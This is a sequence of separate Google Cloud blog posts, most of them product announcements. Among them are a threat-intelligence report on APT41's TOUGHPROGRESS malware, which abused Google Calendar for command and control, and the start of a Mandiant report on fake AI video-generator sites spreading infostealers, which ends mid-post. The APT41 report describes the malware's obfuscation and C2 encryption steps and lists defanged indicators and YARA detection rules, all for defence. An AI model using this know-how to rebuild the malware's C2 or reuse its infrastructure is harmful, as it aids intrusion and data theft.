gcp

In the event of a cloud incident, everyone wants swift and clear communication from the cloud provider, and to be able to leverage that information effectively. Personalized Service Health in the Google Cloud console addresses this need with fast, transparent, relevant, and actionable communications about Google Cloud service disruptions, customized to your specific footprint. This helps you to quickly identify the source of the problem, helping you answer the question, “Is it Google or is it me?” You can then integrate this information into your incident response workflows to resolve the incident more efficiently.

We’re excited to announce that you can prompt Gemini Cloud Assist to pull real-time information about active incidents, powered by Personalized Service Health, providing you with streamlined incident management, including discovery, impact assessment, and recovery. By combining Gemini’s guidance with Personalized Service Health insights and up-to-the-minute information, you can assess the scope of impact and begin troubleshooting – all within a single, AI-driven Gemini Cloud Assist chat. Further, you  can initiate this sort of incident discovery from anywhere within the console, offering immediate access to relevant incidents without interrupting your workflow. You can also check for active incidents impacting your projects, gathering details on their scope and the latest updates directly sourced from Personalized Service Health.

Using Gemini Cloud Assist with Personalized Service Health

We designed Gemini Cloud Assist with a user-friendly layout and a well-organized information structure. Crucial details, including dynamic timelines, latest updates, symptoms, and workarounds sourced directly from Personalized Service Health, are now presented in the console, enabling conversational follow-ups. Gemini Cloud Assist highlights critical insights from Personalized Service Health, helping you refine your investigations and understand the impact of incidents.

To illustrate the power of this integration, the following demo showcases a typical incident response workflow leveraging the combined capabilities of Gemini and Personalized Service Health.

Incident discovery and triage
In the crucial first moments of an incident, Gemini Cloud Assist helps you answer “Is it Google or is it me?” Gemini Cloud Assist accesses data directly from Personalized Service Health, and provides feedback on which projects and at what locations are affected by a Google Cloud incident, speeding up the triage process.

To illustrate how you can start this process, try asking Gemini Cloud Assist questions like:

• Is my project impacted by a Google Cloud incident?

• Are there any incidents impacting Google Cloud at the moment?

Investigating and evaluating impact
Once you’ve identified a relevant Google Cloud incident, you can use Gemini Cloud Assist to delve deeper into the specifics and evaluate its impact on your environment. Furthermore, by asking follow-up questions, Gemini Cloud Assist can retrieve updates from Personalized Service Health about the incident as it evolves. You can then further investigate by asking Gemini to pinpoint exactly which of your apps or projects, and at what locations, might be affected by the reported incident.

Here are examples of prompts you might pose to Gemini Cloud Assist:

• Tell me more about the ongoing Incident ID [X] (Replace [X] with the Incident ID)

• Is [X] impacted? (Replace [X] with your specific location or Google Cloud product)

• What is the latest update on Incident ID [X]?

• Show me the details of Incident ID [X].

• Can you guide me through some troubleshooting steps for [impacted Google Cloud product]?

Mitigation and recovery
Finally, Gemini Cloud Assist can also act as an intelligent assistant during the recovery phase, providing you with actionable guidance. You can gain access to relevant logs and monitoring data for more efficient resolution. Additionally, Gemini Cloud Assist can help surface potential workarounds from Personalized Service Health and direct you to the tools and information you need to restore your projects or applications. Here are some sample prompts:

• What are the workarounds for the incident ID [X]? (Replace [X] with the Incident ID)

• Can you suggest a temporary solution to keep my application running?

• How can I find logs for this impacted project?

From these prompts, Gemini retrieves relevant information from Personalized Service Health to provide you with personalized insights into your Google Cloud environment’s health — both for ongoing events and incidents from up to one year in the past. This helps when investigating an incident to narrow down its impact, as well as assisting in recovery. 

Next steps

Looking ahead, we are excited to provide even deeper insights and more comprehensive incident management with Gemini Cloud Assist and Personalized Service Health, extending these AI-driven capabilities beyond a single project view. Ready to get started? 

• Learn more about Personalized Service Health, or reach out to your account team to enable it.

• Get started with Gemini Cloud Assist. Refine your prompts to ask about your specific regions or Google Cloud products, and experiment to discover how it can help you proactively manage incidents.

The Google Data Cloud is a uniquely integrated platform built on Google’s planet-scale infrastructure, infused with AI, and features an open lakehouse architecture for multimodal data. Already, organizations like Snap Inc. credit Google’s Data Cloud and open lakehouse architecture with empowering their data engineers and data scientists to do more with their data assets.

“Partnering with Google Cloud has been instrumental in our journey to build Snap’s next-generation, open lakehouse and democratize Spark and Iceberg in our developer community!” – Zhengyi Liu, Senior Manager – Software Engineering, Snap Inc.

Today, we’re excited to announce a series of innovations to our AI-powered lakehouse that sets a new standard for openness, intelligence, and performance. These innovations include:

• BigLake Iceberg native storage: leverages Google’s Cloud Storage (GCS) to provide an enterprise-grade experience for managing and interoperating with Iceberg data. This includes BigLake tables for Apache Iceberg (GA) and BigLake metastore with a new REST Catalog API (Preview).

• United operational and analytical engines: building on the BigLake foundation, customers can seamlessly interoperate on the same Iceberg open data foundation using BigQuery for analytical workloads (GA) and AlloyDB for PostgreSQL (Preview) to target operational needs.

• Performance acceleration for BigQuery SQL: delivering a suite of automated SQL engine enhancements for significantly faster and more agile data processing, featuring the BigQuery advanced runtime, a low-latency query API, column metadata indexing, and an order of magnitude speedup for fine-grained updates/deletes.

• High-performance Lightning Engine for Apache Spark: our new Lightning Engine (Preview) is designed to supercharge Apache Spark, leveraging optimized data connectors, efficient columnar shuffle operations, in-built caching, and vectorized execution.

• Dataplex Universal Catalog: extends AI-powered intelligence and unified governance across the Google Cloud data estate by automatically discovering and organizing metadata from data to AI (including BigLake Iceberg, BigQuery, Spanner, Vertex AI models), enabling central policy enforcement via BigLake, and supporting AI-driven curation, data insights and semantic search.

• AI-native notebooks and tooling: developer experiences are improved with Gemini-powered notebooks, PySpark code generation, and code extensions for JupyterLab and Visual Studio Code. Additionally, third-party notebook interfaces now offer enhanced and integrated experiences.

Let’s explore these new innovations.

Expanded BigLake services: Open, unified, and interoperable

We are actively reimagining BigLake into a comprehensive storage runtime for Google Data Cloud using Google’s Cloud Storage. This approach lets you build open, managed and high-performance lakehouses that span Google native storage and data stored in open formats. As part of BigLake, we are announcing our new Iceberg native storage, which provides enterprise-grade support for Iceberg on Google’s Cloud Storage through BigLake tables for Apache Iceberg (GA). BigLake natively supports Google’s Cloud Storage management capabilities and extends these to Iceberg data, enabling you to use storage Autoclass for efficient data tiering to colder storage classes and apply customer-managed encryption keys (CMEK) to your storage buckets. BigLake is also natively supported in our Dataplex Universal Catalog, helping to ensure that centralized governance is consistently enforced across your entire data estate.

Underlying BigLake, the new BigLake metastore (GA) with an Apache Iceberg REST Catalog API (Preview), allows you to achieve true openness and interoperability across your data ecosystem while simplifying management and governance. BigLake metastore is built on Google’s planet-scale infrastructure, offering a unified, managed, serverless, and scalable offering, bringing together enterprise metadata that spans BigQuery, Iceberg native storage, and self managed open formats to support analytics, operational querying, streaming, and AI. The BigLake solution enables universal engine interoperability, supporting a range of query engines — including first-party Google Cloud services such as BigQuery, AlloyDB, and Google Cloud Serverless for Apache Spark, as well as third party and open-source engines— to consistently operate on Iceberg data managed by BigLake. 

In addition, it is now easier than ever to bring data into the Iceberg native storage through our enhanced Migration Services that feature automated Iceberg table and metadata migration from Hadoop/Cloudera (Preview) and a push-button Delta to Iceberg service (Preview).

Analytical and operational engines unite on open data

When you need to perform deep analytics, BigQuery can now read and write Iceberg data using BigLake tables for Apache Iceberg. BigQuery further enhances Iceberg tables with features traditionally associated with proprietary data warehouses, offering high-throughput streaming for zero-latency queries, enhanced table management with automatic data reclustering, and the ability to build advanced ETL use cases with support for multi-table transactions (Preview). In addition, you can leverage BigQuery’s built-in AI capabilities (BQML, AI Query Engine, multimodal analysis) directly on your open datasets. Through this integration, you benefit from the openness and data ownership associated with native Iceberg storage, while simultaneously gaining access to BigQuery’s expansive capabilities. In fact, customer adoption of BigLake Iceberg usage with BigQuery has grown nearly 3x in 18 months, now managing hundreds of petabytes.

Unified data management extends beyond analytics into the operational heart of your business, with AlloyDB for PostgreSQL, our high-performance operational database, which can now natively query the same BigLake-managed Iceberg data. Now, your operational applications can tap into the richness of BigLake without complex ETL, and you can apply AlloyDB AI capabilities such as semantic search and natural language querying to your Iceberg data.

Customers like Bayer modernized their data cloud to store and analyze vast amounts of observational data using a combination of AlloyDB and BigQuery. They use BigQuery to produce real-time analytics and insights which are operationalized by AlloyDB, delivering 50% better response rates and 5x more throughput than their previous solution. 

Unleashing high-performance BigQuery SQL and serverless Spark on open data 

We’re also excited to deliver new high-performance data processing, so that all data can be activated quickly and intelligently. We continue to innovate on BigQuery’s SQL engine with a suite of unique, automated performance enhancements. The BigQuery advanced runtime (Preview), can automatically accelerate analytical workloads, using enhanced vectorization and short query optimized mode, without requiring any user action or code changes. This is complemented by the BigQuery API optional job creation mode (GA), which optimizes query paths for short-duration, interactive queries, reducing latency. Further query efficiency is unlocked by the BigQuery column metadata index (CMETA) (GA), which helps process queries on large tables through more efficient, system-managed data pruning. Other architectural improvements also mean that BigQuery fine-grained updates/deletes (Preview) now operate an order of magnitude faster, increasing agility for large-scale data operations, including on open formats.

Simultaneously, we’re launching an accelerated Apache Spark experience with our new Lightning Engine (Preview) for Apache Spark. The Lightning Engine accelerates Apache Spark performance through highly optimized data connectors for Cloud Storage and BigQuery storage, efficient columnar shuffle operations, and intelligent in-built caching mechanisms. Furthermore, our Lightning Engine leverages vectorized execution built with native C++ libraries (Velox and Gluten), optimized for Apache Spark. This powerful combination delivers 3.6x faster Spark performance for TPC-H like benchmarks. In addition, our Spark offering is AI/ML-ready, providing pre-packaged AI libraries, updated ML runtimes, and easy GPU support, establishing Apache Spark–available via our Google Cloud Serverless for Apache Spark offering or via Dataproc cluster deployments–as a first-class, high-performance citizen in a Google Data Cloud lakehouse environment.

Dataplex Universal Catalog: AI-powered intelligence across Google Cloud

An effective AI-driven data strategy hinges on having an intelligent and active universal catalog that can operate at any scale. This is what Dataplex Universal Catalog now provides for the Google Data Cloud, transforming your entire distributed data estate into trusted, discoverable, and actionable resources.

Dataplex Universal Catalog automatically discovers, understands, and organizes metadata across your whole analytical and operational landscape. This comprehensive view now includes BigLake-native Iceberg storage, other open formats like Delta and Hudi on Cloud Storage, analytical data in BigQuery, transactional data from databases like Spanner, and metadata from machine learning models in Vertex AI—showcasing pervasive governance across Google’s Data Cloud.

This is also integral to the lakehouse by enabling users to define governance policies centrally and enforce them consistently across multiple data engines through BigLake. This integration supports fine-grained access controls and strengthens governance, across all engines of choice in Google’s Data Cloud. The BigLake solution supports credential vending, which allows users to securely extend centrally defined policies all the way to data in Cloud Storage. 

Dataplex Universal Catalog is powered by AI, with a Gemini-enhanced knowledge graph, transforming metadata into dynamic, actionable intelligence. Here, AI automates metadata curation, infers hidden relationships between data elements, proactively recommends insights from data backed by complex queries, and enables semantic search with natural language. It also fuels new AI-powered experiences and autonomous agents. For instance, Gemini-powered assistance using Dataplex Universal Catalog shows 50% greater precision in identifying datasets, significantly accelerating insights. Dataplex Universal Catalog is also the foundation of an open ecosystem with seamless metadata federation to platforms like Collibra, and ensures broad connectivity through Dataplex Universal Catalog APIs.

Empowering practitioners with AI-native notebooks and tooling

At Google Cloud, our goal is to revolutionize the data practitioner’s experience by embedding sophisticated AI and lakehouse integrations directly into their preferred tools and workflows. This commitment to an open, flexible, and intelligent environment lets data scientists, engineers, and analysts unlock new levels of productivity and innovation.

Making this possible are our next-gen, AI-native BigQuery Notebooks, which offer a unified and interoperable development experience across SQL, Python, and Apache Spark. This experience is enhanced by deeply embedded Gemini assistive capabilities. Gemini acts as an intelligent collaborator, offering advanced PySpark code generation, insightful explanations of complex code, and direct integration with Cloud Assist Investigations for serverless Spark troubleshooting (Preview), dramatically reducing development friction and accelerating the path from data to insight. 

Furthermore, new JupyterLab and Visual Studio Code extensions for BigQuery, Dataproc and Google Cloud Serverless for Apache Spark (Preview) allow developers to connect to Google Cloud’s open lakehouse capabilities directly from their preferred IDEs with minimal setup. Users can start developing within minutes with access to all their lakehouse datasets and files in their preferred tool, supporting their end-to-end journey from development to deployment. The consumption of notebooks using serverless Spark more than quadrupled from Q1 2024 to Q1 2025.

Together, these integrated advancements help deliver an adaptable, intelligent, high-performance Data Cloud anchored on the lakehouse architecture, equipping organizations to connect all of their data to Google’s AI, unlock its full potential, and define innovation in the AI era. Click here to learn more and sign up for early access to these new capabilities. We’re excited to see the solutions you’ll build.

Written by: Patrick Whitsell

Google Threat Intelligence Group’s (GTIG) mission is to protect Google’s billions of users and Google’s multitude of products and services. In late October 2024, GTIG discovered an exploited government website hosting malware being used to target multiple other government entities. The exploited site delivered a malware payload, which we have dubbed “TOUGHPROGRESS”, that took advantage of Google Calendar for command and control (C2). Misuse of cloud services for C2 is a technique that many threat actors leverage in order to blend in with legitimate activity. 

We assess with high confidence that this malware is being used by the PRC based actor APT41 (also tracked as HOODOO). APT41’s targets span the globe, including governments and organizations within the global shipping and logistics, media and entertainment, technology, and automotive sectors. 

Overview

In this blog post we analyze the malware delivery methods, technical details of the malware attack chain, discuss other recent APT41 activities, and share indicators of compromise (IOCs) to help security practitioners defend against similar attacks. We also detail how GTIG disrupted this campaign using custom detection signatures, shutting down attacker-controlled infrastructure, and protections added to Safe Browsing.

Delivery

APT41 sent spear phishing emails containing a link to the ZIP archive hosted on the exploited government website. The archive contains an LNK file, masquerading as a PDF, and a directory. Within this directory we find what looks like seven JPG images of arthropods. When the payload is executed via the LNK, the LNK is deleted and replaced with a decoy PDF file that is displayed to the user indicating these species need to be declared for export.

$ unzip -l 出境海關申報清單.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        0  2024-10-23 11:00   image/
    12633  2024-10-23 10:53   image/1.jpg
    10282  2024-10-23 10:54   image/2.jpg
     8288  2024-10-23 10:54   image/3.jpg
     4174  2024-10-23 10:54   image/4.jpg
   181656  2024-10-23 10:54   image/5.jpg
   997111  2024-10-23 11:00   image/6.jpg
   124928  2024-10-23 11:00   image/7.jpg
    88604  2024-10-23 11:03   申報物品清單.pdf.lnk
---------                     -------
  1427676                     9 files

The files “6.jpg” and “7.jpg” are fake images. The first file is actually an encrypted payload and is decrypted by the second file, which is a DLL file launched when the target clicks the LNK. 

Malware Infection Chain

This malware has three distinct modules, deployed in series, each with a distinct function. Each module also implements stealth and evasion techniques, including memory-only payloads, encryption, compression, process hollowing, control flow obfuscation, and leveraging Google Calendar for C2.

1. PLUSDROP – DLL to decrypt and execute the next stage in memory.

2. PLUSINJECT – Launches and performs process hollowing on a legitimate “svchost.exe” process, injecting the final payload.

3. TOUGHPROGRESS – Executes actions on the compromised Windows host. Uses Google Calendar for C2. 

TOUGHPROGRESS Analysis

TOUGHPROGRESS begins by using a hardcoded 16-byte XOR key to decrypt embedded shellcode stored in the sample’s “.pdata” region. The shellcode then decompresses a DLL in memory using COMPRESSION_FORMAT_LZNT1. This DLL layers multiple obfuscation techniques to obscure the control flow. 

1. Register-based Indirect Calls

2. Dynamic Address Arithmetic

3. 64-bit register overflow

4. Function Dispatch Table

The registered-based indirect call is used after dynamically calculating the address to store in the register. This calculation involves two or more hardcoded values that intentionally overflow the 64-bit register. Here is an example calling CreateThread.

We can reproduce how this works using Python “ctypes” to simulate 64-bit register arithmetic. Adding the two values together overflows the 64-bit address space and the result is the address of the function to be called.

These obfuscation techniques manifest as a Control Flow Obfuscation tactic. Due to the indirect calls and arithmetic operations, the disassembler cannot accurately recreate a control flow graph.

Calendar C2

TOUGHPROGRESS has the capability to read and write events with an attacker-controlled Google Calendar. Once executed, TOUGHPROGRESS creates a zero minute Calendar event at a hardcoded date, 2023-05-30, with data collected from the compromised host being encrypted and written in the Calendar event description. 

The operator places encrypted commands in Calendar events on 2023-07-30 and 2023-07-31, which are predetermined dates also hardcoded into the malware. TOUGHPROGRESS then begins polling Calendar for these events. When an event is retrieved, the event description is decrypted and the command it contains is executed on the compromised host. Results from the command execution are encrypted and written back to another Calendar event.

In collaboration with the Mandiant FLARE team, GTIG reverse engineered the C2 encryption protocol leveraged by TOUGHPROGRESS. The malware uses a hardcoded 10-byte XOR key and generates a per-message 4-byte XOR key.

1. Compress message with LZNT1

2. Encrypt the message with a 4-byte XOR key

3. Append the 4-byte key at the end of a message header (10 bytes total)

4. Encrypt the header with the 10-byte XOR key

5. Prepend the encrypted header to the front of the message

6. The combined encrypted header and message is the Calendar event description

Disrupting Attackers to Protect Google, Our Users, and Our Customers

GTIG’s goal is not just to monitor threats, but to counter and disrupt them. At Google, we aim to protect our users and customers at scale by proactively blocking malware campaigns across our products. 

To disrupt APT41 and TOUGHPROGRESS malware, we have developed custom fingerprints to identify and take down attacker-controlled Calendars. We have also terminated attacker-controlled Workspace projects, effectively dismantling the infrastructure that APT41 relied on for this campaign. Additionally, we updated file detections and added malicious domains and URLs to the Google Safe Browsing blocklist. 

In partnership with Mandiant Consulting, GTIG notified the compromised organizations. We provided the notified organizations with a sample of TOUGHPROGRESS network traffic logs, and information about the threat actor, to aid with detection and incident response.

Protecting Against Ongoing Activity

GTIG has been actively monitoring and protecting against APT41’s attacks using Workspace apps for several years. This threat group is known for their creative malware campaigns, sometimes leveraging Workspace apps. 

• Google Cloud’s Office of the CISO published the April 2023 Threat Horizons Report detailing HOODOO’s use of Google Sheets and Google Drive for malware C2.

• In October 2024, Proofpoint published a report attributing the VOLDEMORT malware family to APT41. 

• The DUSTTRAP malware family, reported by GTIG and Mandiant in July of 2024, used Public Cloud hosting for C2.

In each case, GTIG identified and terminated the attacker-controlled Workspace projects and infrastructure APT41 relied on for these campaigns.

Free Web Hosting Infrastructure

Since at least August 2024, we have observed APT41 using free web hosting tools for distributing their malware. This includes VOLDEMORT, DUSTTRAP, TOUGHPROGRESS and likely other payloads as well. Links to these free hosting sites have been sent to hundreds of targets in a variety of geographic locations and industries. 

APT41 has used Cloudflare Worker subdomains the most frequently. However, we have also observed use of InfinityFree and TryCloudflare. The specific subdomains and URLs here have been observed in previous campaigns, but may no longer be in use by APT41.

Cloudflare Workers

• word[.]msapp[.]workers[.]dev 

• cloud[.]msapp[.]workers[.]dev 

TryCloudflare

• term-restore-satisfied-hence[.]trycloudflare[.]com

• ways-sms-pmc-shareholders[.]trycloudflare[.]com

InfinityFree

• resource[.]infinityfreeapp[.]com

• pubs[.]infinityfreeapp[.]com

APT41 has also been observed using URL shorteners in their phishing messages. The shortened URL redirects to their malware hosted on free hosting app subdomains. 

• https[:]//lihi[.]cc/6dekU

• https[:]//tinyurl[.]com/hycev3y7

• https[:]//my5353[.]com/nWyTf

• https[:]//reurl[.]cc/WNr2Xy

All domains and URLs in this blog post have been added to the Safe Browsing blocklist. This enables a warning on site access and prevents users from downloading the malware. 

Indicators of Compromise

The IOCs in this blog post are also available as a collection in Google Threat Intelligence.

Hashes

Domains

• word[.]msapp[.]workers[.]dev 

• cloud[.]msapp[.]workers[.]dev 

• term-restore-satisfied-hence[.]trycloudflare[.]com

• ways-sms-pmc-shareholders[.]trycloudflare[.]com

• resource[.]infinityfreeapp[.]com 

• pubs[.]infinityfreeapp[.]com

URL Shortener Links

• https[:]//lihi[.]cc/6dekU

• https[:]//lihi[.]cc/v3OyQ

• https[:]//lihi[.]cc/5nlgd

• https[:]//lihi[.]cc/edcOv

• https[:]//lihi[.]cc/4z5sh

• https[:]//tinyurl[.]com/mr42t4yv

• https[:]//tinyurl[.]com/hycev3y7

• https[:]//tinyurl[.]com/mpa2c5wj

• https[:]//tinyurl[.]com/3wnz46pv

• https[:]//my5353[.]com/ppOH5

• https[:]//my5353[.]com/nWyTf

• https[:]//my5353[.]com/fPUcX

• https[:]//my5353[.]com/ZwEkm

• https[:]//my5353[.]com/vEWiT

• https[:]//reurl[.]cc/WNr2Xy

Calendar

• 104075625139-l53k83pb6jbbc2qbreo4i5a0vepen41j.apps.googleusercontent.com

• https[:]//www[.]googleapis[.]com/calendar/v3/calendars/ff57964096cadc1a8733cf566b41c9528c89d30edec86326c723932c1e79ebf0@group.calendar.google.com/events

YARA Rules

rule G_Backdoor_TOUGHPROGRESS_LNK_1 {
	meta:
		author = "GTIG"
		date_created = "2025-04-29"
		date_modified = "2025-04-29"
		md5 = "65da1a9026cf171a5a7779bc5ee45fb1"
		rev = 1
	strings:
		$marker = { 4C 00 00 00 }
		$str1 = "rundll32.exe" ascii wide
		$str2 = ".\image\7.jpg,plus" wide
		$str3 = "%PDF-1"
		$str4 = "PYL="
	condition:
		$marker at 0 and all of them
}

rule G_Dropper_PLUSDROP_1 {
	meta:
		author = "GTIG"
		date_created = "2025-04-29"
		date_modified = "2025-04-29"
		md5 = "9492022a939d4c727a5fa462590dc0dd"
		rev = 1
	strings:
		$decrypt_and_launch_payload = { 48 8B ?? 83 ?? 0F 0F B6 ?? ?? ?? 
30 04 ?? 48 FF ?? 49 3B ?? 72 ?? 80 [1-5] 00 75 ?? B? 5B 55 D2 56 [0-8] E8 
[4-32] 33 ?? 33 ?? FF D? [0-4] FF D? }
	condition:
		uint16(0) == 0x5a4d and all of them
}

Additional YARA Rules

This is a second dropper used to launch PLUSDROP in another TOUGHPROGRESS campaign.

rule G_Dropper_TOUGHPROGRESS_XML_1 {
    meta:
        author = "GTIG"
        description = "XML lure file used to launch a PLUSDROP dll."
        md5 = "dccbb41af2fcf78d56ea3de8f3d1a12c"
    strings:
        $str1 = "System.Convert.FromBase64String"
        $str2 = "VirtualAlloc"
        $str3 = ".InteropServices.Marshal.Copy"
        $str4 = ".DllImport"
        $str5 = "kernel32.dll"
        $str6 = "powrprof.dll"
        $str7 = ".Marshal.GetDelegateForFunctionPointer"
    condition:
        uint16(0)!= 0x5A4D and all of them and filesize > 500KB and 
filesize < 5MB
}

PLUSBED is an additional stage observed in other TOUGHPROGRESS campaigns.

rule G_Dropper_PLUSEBED_2 {
	meta:
		author = "GTIG"
		date_created = "2025-04-29"
		date_modified = "2025-04-29"
		md5 = "39a46d7f1ef9b9a5e40860cd5f646b9d"
		rev = 1
	strings:
		$api1 = { BA 54 B8 B9 1A }
		$api2 = { BA 78 1F 20 7F }
		$api3 = { BA 62 34 89 5E }
		$api4 = { BA 65 62 10 4B }
		$api5 = { C7 44 24 34 6E 74 64 6C 66 C7 44 24 38 6C 00 FF D0 }
	condition:
		uint16(0) != 0x5A4D and all of them
}

Heard of AI agents lately? We know many of you are itching to start building them! Here’s your chance with the Agent Development Kit Hackathon with Google Cloud. 

Everyone’s talking about AI agents, but the real magic happens when they collaborate to tackle complex tasks. Think: complex processes, data analysis, content creation, and customer support. In this hackathon, you’ll build autonomous multi-agent AI systems using Google Cloud and the open source Agent Development Kit (ADK). 

This is your chance to dive deep into cutting-edge AI, showcase your skills, and contribute to the future of agent development.

Why join?

• Hands-on learning with the ADK: This is your chance to try out and contribute to Agent Development Kit (ADK). We’ll provide you with the resources, support, and expert guidance you need to build sophisticated multi-agent systems.

• Real-world impact: Tackle real world problems that directly impact how work gets done, from automating complex processes and deriving data insights to changing customer service and content creation.

• A showcase for your talent: Present your project to a panel of judges and demonstrate your expertise to a wide audience. Build working agents that can help your workflows and be the foundation for a future product.

And the rewards? Exciting prizes await!

We’re offering a range of exciting prizes:

• Overall grand prize: $15,000 in USD, $3,000 in Google Cloud Credits for use with a Cloud Billing Account, 1 year of Google Developer Program Premium subscription at no-cost, virtual coffee with a Google team member, and social promo
• Regional winners: $8,000 in USD, $1,000 in Google Cloud Credits for use with a Cloud Billing Account, virtual coffee with a Google team member, and social promo
• Honorable mentions: $1000 in USD and $500 in Google Cloud Credits for use with a Cloud Billing Account

Unleash the power of the Agent Development Kit (ADK):

ADK is a flexible and modular framework designed for developing and deploying AI agents. It’s an open-source framework that offers tight integration with the Google ecosystem and Gemini models. ADK makes it easy to get started with simple agents powered by Gemini models and Google AI tools, while also providing the control needed for more complex agent architectures and orchestration.

What to build

Your project should demonstrate how to design and orchestrate interactions between multiple autonomous agents using ADK. Build in one of these categories:

• Automation of complex processes: Design multi-agent workflows to automate complex, multi-step business processes, software development lifecycle, or manage intricate tasks.
• Data analysis and insights: Create multi-agent systems that autonomously analyze data from various sources, derive meaningful insights using tools like BigQuery, and collaboratively present findings.
• Customer service and engagement: Develop intelligent virtual assistants or support agents built with ADK as multi-agent systems to handle complex customer inquiries, provide personalized support, and proactively engage with customers.
• Content creation and generation: Build multi-agent systems that can autonomously generate different forms of content, such as marketing materials, reports, or code, by orchestrating agents with specialized content generation capabilities.

Crucial note: Your project must be built using the Agent Development Kit (ADK), focusing on the design and interactions between multiple agents. Think ADK first, but feel free to supercharge your solution by integrating with other awesome Google Cloud technologies!

Ready to start building?

Head over to our hackathon website and watch our webinar to learn more, review the rules, and register.

Google Cloud’s Vertex AI platform makes it easy to experiment with and customize over 200 advanced foundation models – like the latest Google Gemini models, and third-party partner models such as Meta’s Llama and Anthropic’s Claude. And now, thanks to a major refresh focused on developer feedback, it’s even more efficient and intuitive. 

The redesigned, developer-first experience will be your source for generative AI media models across all modalities. You’ll have access to Google’s powerful generative AI media models such as Veo, Imagen, Chirp and Lyria in the Vertex AI Media Studio. These aren’t just cosmetic changes; they translate directly into five workflow benefits, from accelerated prototyping to experimentation:

1. Stay cutting-edge: Get hands-on experience with Google’s latest AI models and features as soon as they’re available.

2. Easier to start with AI in Cloud: The new design makes it easier for developers of all experience levels to start building with generative AI.

3. Accelerated prototyping: Quickly test ideas, iterate on prompts, and prototype applications faster than before.

4. Integrated end-to-end workflow: Move easily from ideation and prompting to grounding, tuning, code generation, and even test deployment – all within a single, cohesive environment…with a couple of clicks! Less tool-switching, more building!

5. Efficient experimentation: Vertex AI Studio provides a place to explore different models, parameters, and prompting techniques.

Dive in to see the key improvements.

What’s new and how it works for you 

We heard you wanted features to explore, iterate and boost your productivity. That’s why we’re making things easier and more powerful in three ways: faster prompting, easier ways to build, and a fresh interface.

Enhanced prompting capabilities:

• Faster prompting: Get prompting faster. Our revamped overview provides quick access to samples and tools, complemented by a unified UI combining Chat and Freeform prompting for a smoother workflow.

• Prompt management & enhancement: Simplify your prompt engineering by easily managing the lifecycle (create, refine, compare, save, track history) while simultaneously improving prompt quality and capabilities through techniques like variables, function calling, and adding examples.

• Integrated prompt engineering: Access to tuning, evaluation, and batch prediction, all designed to optimize model performance.

Better ways to build 

• Build with Gemini: Access and experiment with the latest Gemini models such as Gemini 2.5 to test:

• Text generation

• Image creation

• Audio generation

• Multimodal capabilities

• and Live API directly within the Studio. 

Fresher interface 

• Dark mode is here: Recognizing that many developers prefer darker interfaces for extended sessions, you can now experience dark mode across the entire Vertex AI platform for improved visual comfort and focus. Activate it easily in your Cloud profile user preferences.

Get started with Vertex AI today 

We’re committed to continually refining Vertex AI Studio based on your feedback, which you can share right in the console, ensuring you have the tools you need for building the next generation of AI applications.

Explore the new Vertex AI Studio and see how these feature and usability improvements can accelerate your development.

Written by: Diana Ion, Rommel Joven, Yash Gupta

Since November 2024, Mandiant Threat Defense has been investigating an UNC6032 campaign that weaponizes the interest around AI tools, in particular those tools which can be used to generate videos based on user prompts. UNC6032 utilizes fake “AI video generator” websites to distribute malware leading to the deployment of payloads such as Python-based infostealers and several backdoors. Victims are typically directed to these fake websites via malicious social media ads that masquerade as legitimate AI video generator tools like Luma AI, Canva Dream Lab, and Kling AI, among others. Mandiant Threat Defense has identified thousands of UNC6032-linked ads that have collectively reached millions of users across various social media platforms like Facebook and LinkedIn. We suspect similar campaigns are active on other platforms as well, as cybercriminals consistently evolve tactics to evade detection and target multiple platforms to increase their chances of success. 

Mandiant Threat Defense has observed UNC6032 compromises culminating in the exfiltration of login credentials, cookies, credit card data, and Facebook information through the Telegram API. This campaign has been active since at least mid-2024 and has impacted victims across different geographies and industries. Google Threat Intelligence Group (GTIG) assesses UNC6032 to have a Vietnam nexus. 

Mandiant Threat Defense acknowledges Meta’s collaborative and proactive threat hunting efforts in removing the identified malicious ads, domains, and accounts. Notably, a significant portion of Meta’s detection and removal began in 2024, prior to Mandiant alerting them of additional malicious activity we identified.

A similar investigation was recently published by Morphisec.

Campaign Overview

Threat actors haven’t wasted a moment capitalizing on the global fascination with Artificial Intelligence. As AI’s popularity surged over the past couple of years, cybercriminals quickly moved to exploit the widespread excitement. Their actions have fueled a massive and rapidly expanding campaign centered on fraudulent websites masquerading as cutting-edge AI tools. These websites have been promoted by a large network of misleading social media ads, similar to the ones shown in Figure 1 and Figure 2.

As part of Meta’s implementation of the Digital Services Act, the Ad Library displays additional information (ad campaign dates, targeting parameters and ad reach) on all ads that target people from the European Union. LinkedIn has also implemented a similar transparency tool.

Our research through both Ad Library tools identified over 30 different websites, mentioned across thousands of ads, active since mid 2024, all displaying similar ad content. The majority of ads which we found ran on Facebook, with only a handful also advertised on LinkedIn. The ads were published using both attacker-created Facebook pages, as well as by compromised Facebook accounts. Mandiant Threat Defense performed further analysis of a sample of over 120 malicious ads and, from the EU transparency section of the ads, their total reach for EU countries was over 2.3 million users. Table 1 displays the top 5 Facebook ads by reach. It should be noted that reach does not equate to the number of victims. According to Meta, the reach of an ad is an estimated number of how many Account Center accounts saw the ad at least once.

The threat actor constantly rotates the domains mentioned in the Facebook ads, likely to avoid detection and account bans. We noted that once a domain is registered, it will be referenced in ads within a few days if not the same day. Moreover, most of the ads are short lived, with new ones being created on a daily basis. 

On LinkedIn, we identified roughly 10 malicious ads, each directing users to hxxps://klingxai[.]com. This domain was registered on September 19, 2024, and the first ad appeared just a day later. These ads have a total impression estimate of 50k-250k. For each ad, the United States was the region with the highest percentage of impressions, although the targeting included other regions such as Europe and Australia.

From the websites investigated, Mandiant Threat Defense observed that they have similar interfaces and offer purported functionalities such as text-to-video or image-to-video generation. Once the user provides a prompt to generate a video, regardless of the input, the website will serve one of the static payloads hosted on the same (or related) infrastructure. 

The payload downloaded is the STARKVEIL malware. It drops three different modular malware families, primarily designed for information theft and capable of downloading plugins to extend their functionality. The presence of multiple, similar payloads suggests a fail-safe mechanism, allowing the attack to persist even if some payloads are detected or blocked by security defences.

In the next section, we will delve deeper into one particular compromise Mandiant Threat Defense responded to.

Luma AI Investigation

Infection Chain

This blog post provides a detailed analysis of our findings on the key components of this campaign:

• Lure: The threat actors leverage social networks to push AI-themed ads that direct users to fake AI websites, resulting in malware downloads.

• Malware: It contains several malware components, including the STARKVEIL dropper, which deploys the XWORM and FROSTRIFT backdoors and the GRIMPULL downloader.

• Execution: The malware makes extensive use of DLL side-loading, in-memory droppers, and process injection to execute its payloads.

• Persistence: It uses AutoRun registry key for its two Backdoors (XWORM and FROSTRIFT).

